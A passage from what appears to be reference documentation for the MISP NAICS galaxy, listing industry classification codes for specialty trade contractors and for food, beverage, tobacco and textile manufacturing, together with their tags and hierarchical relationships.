  • child-of: misp-galaxy:naics="2383" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23839" with estimative-language:likelihood-probability="likely"

2389

Other Specialty Trade Contractors

The tag is: misp-galaxy:naics="2389"

2389 has relationships with:

  • child-of: misp-galaxy:naics="238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23891" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="23899" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="238990" with estimative-language:likelihood-probability="likely"

23891

Site Preparation Contractors

The tag is: misp-galaxy:naics="23891"

23891 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238910" with estimative-language:likelihood-probability="likely"

238910

Site Preparation Contractors

The tag is: misp-galaxy:naics="238910"

238910 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23891" with estimative-language:likelihood-probability="likely"

23899

All Other Specialty Trade Contractors

The tag is: misp-galaxy:naics="23899"

23899 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="238990" with estimative-language:likelihood-probability="likely"

238990

All Other Specialty Trade Contractors

The tag is: misp-galaxy:naics="238990"

238990 has relationships with:

  • child-of: misp-galaxy:naics="2389" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="23899" with estimative-language:likelihood-probability="likely"

31-33

Manufacturing

The tag is: misp-galaxy:naics="31-33"

311

Food Manufacturing

The tag is: misp-galaxy:naics="311"

311 has relationships with:

  • parent-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

3111

Animal Food Manufacturing

The tag is: misp-galaxy:naics="3111"

3111 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311119" with estimative-language:likelihood-probability="likely"

31111

Animal Food Manufacturing

The tag is: misp-galaxy:naics="31111"

31111 has relationships with:

  • child-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

311111

Dog and Cat Food Manufacturing

The tag is: misp-galaxy:naics="311111"

311111 has relationships with:

  • child-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

311119

Other Animal Food Manufacturing

The tag is: misp-galaxy:naics="311119"

311119 has relationships with:

  • child-of: misp-galaxy:naics="3111" with estimative-language:likelihood-probability="likely"

3112

Grain and Oilseed Milling

The tag is: misp-galaxy:naics="3112"

3112 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311224" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311225" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31123" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311230" with estimative-language:likelihood-probability="likely"

31121

Flour Milling and Malt Manufacturing

The tag is: misp-galaxy:naics="31121"

31121 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311211

Flour Milling

The tag is: misp-galaxy:naics="311211"

311211 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311212

Rice Milling

The tag is: misp-galaxy:naics="311212"

311212 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311213

Malt Manufacturing

The tag is: misp-galaxy:naics="311213"

311213 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

31122

Starch and Vegetable Fats and Oils Manufacturing

The tag is: misp-galaxy:naics="31122"

31122 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311221

Wet Corn Milling and Starch Manufacturing

The tag is: misp-galaxy:naics="311221"

311221 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311224

Soybean and Other Oilseed Processing

The tag is: misp-galaxy:naics="311224"

311224 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

311225

Fats and Oils Refining and Blending

The tag is: misp-galaxy:naics="311225"

311225 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

31123

Breakfast Cereal Manufacturing

The tag is: misp-galaxy:naics="31123"

31123 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311230" with estimative-language:likelihood-probability="likely"

311230

Breakfast Cereal Manufacturing

The tag is: misp-galaxy:naics="311230"

311230 has relationships with:

  • child-of: misp-galaxy:naics="3112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31123" with estimative-language:likelihood-probability="likely"

3113

Sugar and Confectionery Product Manufacturing

The tag is: misp-galaxy:naics="3113"

3113 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31135" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311351" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311352" with estimative-language:likelihood-probability="likely"

31131

Sugar Manufacturing

The tag is: misp-galaxy:naics="31131"

31131 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311313

Beet Sugar Manufacturing

The tag is: misp-galaxy:naics="311313"

311313 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311314

Cane Sugar Manufacturing

The tag is: misp-galaxy:naics="311314"

311314 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

31134

Nonchocolate Confectionery Manufacturing

The tag is: misp-galaxy:naics="31134"

31134 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311340" with estimative-language:likelihood-probability="likely"

311340

Nonchocolate Confectionery Manufacturing

The tag is: misp-galaxy:naics="311340"

311340 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31134" with estimative-language:likelihood-probability="likely"

31135

Chocolate and Confectionery Manufacturing

The tag is: misp-galaxy:naics="31135"

31135 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311351

Chocolate and Confectionery Manufacturing from Cacao Beans

The tag is: misp-galaxy:naics="311351"

311351 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

311352

Confectionery Manufacturing from Purchased Chocolate

The tag is: misp-galaxy:naics="311352"

311352 has relationships with:

  • child-of: misp-galaxy:naics="3113" with estimative-language:likelihood-probability="likely"

3114

Fruit and Vegetable Preserving and Specialty Food Manufacturing

The tag is: misp-galaxy:naics="3114"

3114 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311423" with estimative-language:likelihood-probability="likely"

31141

Frozen Food Manufacturing

The tag is: misp-galaxy:naics="31141"

31141 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311411

Frozen Fruit, Juice, and Vegetable Manufacturing

The tag is: misp-galaxy:naics="311411"

311411 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311412

Frozen Specialty Food Manufacturing

The tag is: misp-galaxy:naics="311412"

311412 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

31142

Fruit and Vegetable Canning, Pickling, and Drying

The tag is: misp-galaxy:naics="31142"

31142 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311421

Fruit and Vegetable Canning

The tag is: misp-galaxy:naics="311421"

311421 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311422

Specialty Canning

The tag is: misp-galaxy:naics="311422"

311422 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

311423

Dried and Dehydrated Food Manufacturing

The tag is: misp-galaxy:naics="311423"

311423 has relationships with:

  • child-of: misp-galaxy:naics="3114" with estimative-language:likelihood-probability="likely"

3115

Dairy Product Manufacturing

The tag is: misp-galaxy:naics="3115"

3115 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311520" with estimative-language:likelihood-probability="likely"

31151

Dairy Product (except Frozen) Manufacturing

The tag is: misp-galaxy:naics="31151"

31151 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311511

Fluid Milk Manufacturing

The tag is: misp-galaxy:naics="311511"

311511 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311512

Creamery Butter Manufacturing

The tag is: misp-galaxy:naics="311512"

311512 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311513

Cheese Manufacturing

The tag is: misp-galaxy:naics="311513"

311513 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

311514

Dry, Condensed, and Evaporated Dairy Product Manufacturing

The tag is: misp-galaxy:naics="311514"

311514 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

31152

Ice Cream and Frozen Dessert Manufacturing

The tag is: misp-galaxy:naics="31152"

31152 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311520" with estimative-language:likelihood-probability="likely"

311520

Ice Cream and Frozen Dessert Manufacturing

The tag is: misp-galaxy:naics="311520"

311520 has relationships with:

  • child-of: misp-galaxy:naics="3115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31152" with estimative-language:likelihood-probability="likely"

3116

Animal Slaughtering and Processing

The tag is: misp-galaxy:naics="3116"

3116 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311615" with estimative-language:likelihood-probability="likely"

31161

Animal Slaughtering and Processing

The tag is: misp-galaxy:naics="31161"

31161 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311611

Animal (except Poultry) Slaughtering

The tag is: misp-galaxy:naics="311611"

311611 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311612

Meat Processed from Carcasses

The tag is: misp-galaxy:naics="311612"

311612 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311613

Rendering and Meat Byproduct Processing

The tag is: misp-galaxy:naics="311613"

311613 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

311615

Poultry Processing

The tag is: misp-galaxy:naics="311615"

311615 has relationships with:

  • child-of: misp-galaxy:naics="3116" with estimative-language:likelihood-probability="likely"

3117

Seafood Product Preparation and Packaging

The tag is: misp-galaxy:naics="3117"

3117 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311710" with estimative-language:likelihood-probability="likely"

31171

Seafood Product Preparation and Packaging

The tag is: misp-galaxy:naics="31171"

31171 has relationships with:

  • child-of: misp-galaxy:naics="3117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311710" with estimative-language:likelihood-probability="likely"

311710

Seafood Product Preparation and Packaging

The tag is: misp-galaxy:naics="311710"

311710 has relationships with:

  • child-of: misp-galaxy:naics="3117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31171" with estimative-language:likelihood-probability="likely"

3118

Bakeries and Tortilla Manufacturing

The tag is: misp-galaxy:naics="3118"

3118 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31181" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31182" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311824" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31183" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311830" with estimative-language:likelihood-probability="likely"

31181

Bread and Bakery Product Manufacturing

The tag is: misp-galaxy:naics="31181"

31181 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311811

Retail Bakeries

The tag is: misp-galaxy:naics="311811"

311811 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311812

Commercial Bakeries

The tag is: misp-galaxy:naics="311812"

311812 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311813

Frozen Cakes, Pies, and Other Pastries Manufacturing

The tag is: misp-galaxy:naics="311813"

311813 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

31182

Cookie, Cracker, and Pasta Manufacturing

The tag is: misp-galaxy:naics="31182"

31182 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311821

Cookie and Cracker Manufacturing

The tag is: misp-galaxy:naics="311821"

311821 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

311824

Dry Pasta, Dough, and Flour Mixes Manufacturing from Purchased Flour

The tag is: misp-galaxy:naics="311824"

311824 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

31183

Tortilla Manufacturing

The tag is: misp-galaxy:naics="31183"

31183 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311830" with estimative-language:likelihood-probability="likely"

311830

Tortilla Manufacturing

The tag is: misp-galaxy:naics="311830"

311830 has relationships with:

  • child-of: misp-galaxy:naics="3118" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31183" with estimative-language:likelihood-probability="likely"

3119

Other Food Manufacturing

The tag is: misp-galaxy:naics="3119"

3119 has relationships with:

  • child-of: misp-galaxy:naics="311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311919" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311941" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311942" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="311999" with estimative-language:likelihood-probability="likely"

31191

Snack Food Manufacturing

The tag is: misp-galaxy:naics="31191"

31191 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311911

Roasted Nuts and Peanut Butter Manufacturing

The tag is: misp-galaxy:naics="311911"

311911 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311919

Other Snack Food Manufacturing

The tag is: misp-galaxy:naics="311919"

311919 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

31192

Coffee and Tea Manufacturing

The tag is: misp-galaxy:naics="31192"

31192 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311920" with estimative-language:likelihood-probability="likely"

311920

Coffee and Tea Manufacturing

The tag is: misp-galaxy:naics="311920"

311920 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31192" with estimative-language:likelihood-probability="likely"

31193

Flavoring Syrup and Concentrate Manufacturing

The tag is: misp-galaxy:naics="31193"

31193 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="311930" with estimative-language:likelihood-probability="likely"

311930

Flavoring Syrup and Concentrate Manufacturing

The tag is: misp-galaxy:naics="311930"

311930 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31193" with estimative-language:likelihood-probability="likely"

31194

Seasoning and Dressing Manufacturing

The tag is: misp-galaxy:naics="31194"

31194 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311941

Mayonnaise, Dressing, and Other Prepared Sauce Manufacturing

The tag is: misp-galaxy:naics="311941"

311941 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311942

Spice and Extract Manufacturing

The tag is: misp-galaxy:naics="311942"

311942 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

31199

All Other Food Manufacturing

The tag is: misp-galaxy:naics="31199"

31199 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311991

Perishable Prepared Food Manufacturing

The tag is: misp-galaxy:naics="311991"

311991 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

311999

All Other Miscellaneous Food Manufacturing

The tag is: misp-galaxy:naics="311999"

311999 has relationships with:

  • child-of: misp-galaxy:naics="3119" with estimative-language:likelihood-probability="likely"

312

Beverage and Tobacco Product Manufacturing

The tag is: misp-galaxy:naics="312"

312 has relationships with:

  • parent-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3122" with estimative-language:likelihood-probability="likely"

3121

Beverage Manufacturing

The tag is: misp-galaxy:naics="3121"

3121 has relationships with:

  • child-of: misp-galaxy:naics="312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312140" with estimative-language:likelihood-probability="likely"

31211

Soft Drink and Ice Manufacturing

The tag is: misp-galaxy:naics="31211"

31211 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

312111

Soft Drink Manufacturing

The tag is: misp-galaxy:naics="312111"

312111 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

312112

Bottled Water Manufacturing

The tag is: misp-galaxy:naics="312112"

312112 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

312113

Ice Manufacturing

The tag is: misp-galaxy:naics="312113"

312113 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

31212

Breweries

The tag is: misp-galaxy:naics="31212"

31212 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312120" with estimative-language:likelihood-probability="likely"

312120

Breweries

The tag is: misp-galaxy:naics="312120"

312120 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31212" with estimative-language:likelihood-probability="likely"

31213

Wineries

The tag is: misp-galaxy:naics="31213"

31213 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312130" with estimative-language:likelihood-probability="likely"

312130

Wineries

The tag is: misp-galaxy:naics="312130"

312130 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31213" with estimative-language:likelihood-probability="likely"

31214

Distilleries

The tag is: misp-galaxy:naics="31214"

31214 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312140" with estimative-language:likelihood-probability="likely"

312140

Distilleries

The tag is: misp-galaxy:naics="312140"

312140 has relationships with:

  • child-of: misp-galaxy:naics="3121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31214" with estimative-language:likelihood-probability="likely"

3122

Tobacco Manufacturing

The tag is: misp-galaxy:naics="3122"

3122 has relationships with:

  • child-of: misp-galaxy:naics="312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="312230" with estimative-language:likelihood-probability="likely"

31223

Tobacco Manufacturing

The tag is: misp-galaxy:naics="31223"

31223 has relationships with:

  • child-of: misp-galaxy:naics="3122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="312230" with estimative-language:likelihood-probability="likely"

312230

Tobacco Manufacturing

The tag is: misp-galaxy:naics="312230"

312230 has relationships with:

  • child-of: misp-galaxy:naics="3122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31223" with estimative-language:likelihood-probability="likely"

313

Textile Mills

The tag is: misp-galaxy:naics="313"

313 has relationships with:

  • parent-of: misp-galaxy:naics="3131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3133" with estimative-language:likelihood-probability="likely"

3131

Fiber, Yarn, and Thread Mills

The tag is: misp-galaxy:naics="3131"

3131 has relationships with:

  • child-of: misp-galaxy:naics="313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313110" with estimative-language:likelihood-probability="likely"

31311

Fiber, Yarn, and Thread Mills

The tag is: misp-galaxy:naics="31311"

31311 has relationships with:

  • child-of: misp-galaxy:naics="3131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313110" with estimative-language:likelihood-probability="likely"

313110

Fiber, Yarn, and Thread Mills

The tag is: misp-galaxy:naics="313110"

313110 has relationships with:

  • child-of: misp-galaxy:naics="3131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31311" with estimative-language:likelihood-probability="likely"

3132

Fabric Mills

The tag is: misp-galaxy:naics="3132"

3132 has relationships with:

  • child-of: misp-galaxy:naics="313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313220" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="313240" with estimative-language:likelihood-probability="likely"

31321

Broadwoven Fabric Mills

The tag is: misp-galaxy:naics="31321"

31321 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313210" with estimative-language:likelihood-probability="likely"

313210

Broadwoven Fabric Mills

The tag is: misp-galaxy:naics="313210"

313210 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31321" with estimative-language:likelihood-probability="likely"

31322

Narrow Fabric Mills and Schiffli Machine Embroidery

The tag is: misp-galaxy:naics="31322"

31322 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313220" with estimative-language:likelihood-probability="likely"

313220

Narrow Fabric Mills and Schiffli Machine Embroidery

The tag is: misp-galaxy:naics="313220"

313220 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31322" with estimative-language:likelihood-probability="likely"

31323

Nonwoven Fabric Mills

The tag is: misp-galaxy:naics="31323"

31323 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313230" with estimative-language:likelihood-probability="likely"

313230

Nonwoven Fabric Mills

The tag is: misp-galaxy:naics="313230"

313230 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31323" with estimative-language:likelihood-probability="likely"

31324

Knit Fabric Mills

The tag is: misp-galaxy:naics="31324"

31324 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="313240" with estimative-language:likelihood-probability="likely"

313240

Knit Fabric Mills

The tag is: misp-galaxy:naics="313240"

313240 has relationships with:

  • child-of: misp-galaxy:naics="3132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="31324" with estimative-language:likelihood-probability="likely"

3133

Textile and Fabric Finishing and Fabric Coating Mills

The tag is: misp-galaxy:naics="3133"

3133 has relationships with:

  • child-of: misp-galaxy:naics="313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="31331" with estimative-language:likelihood-probability="likely"

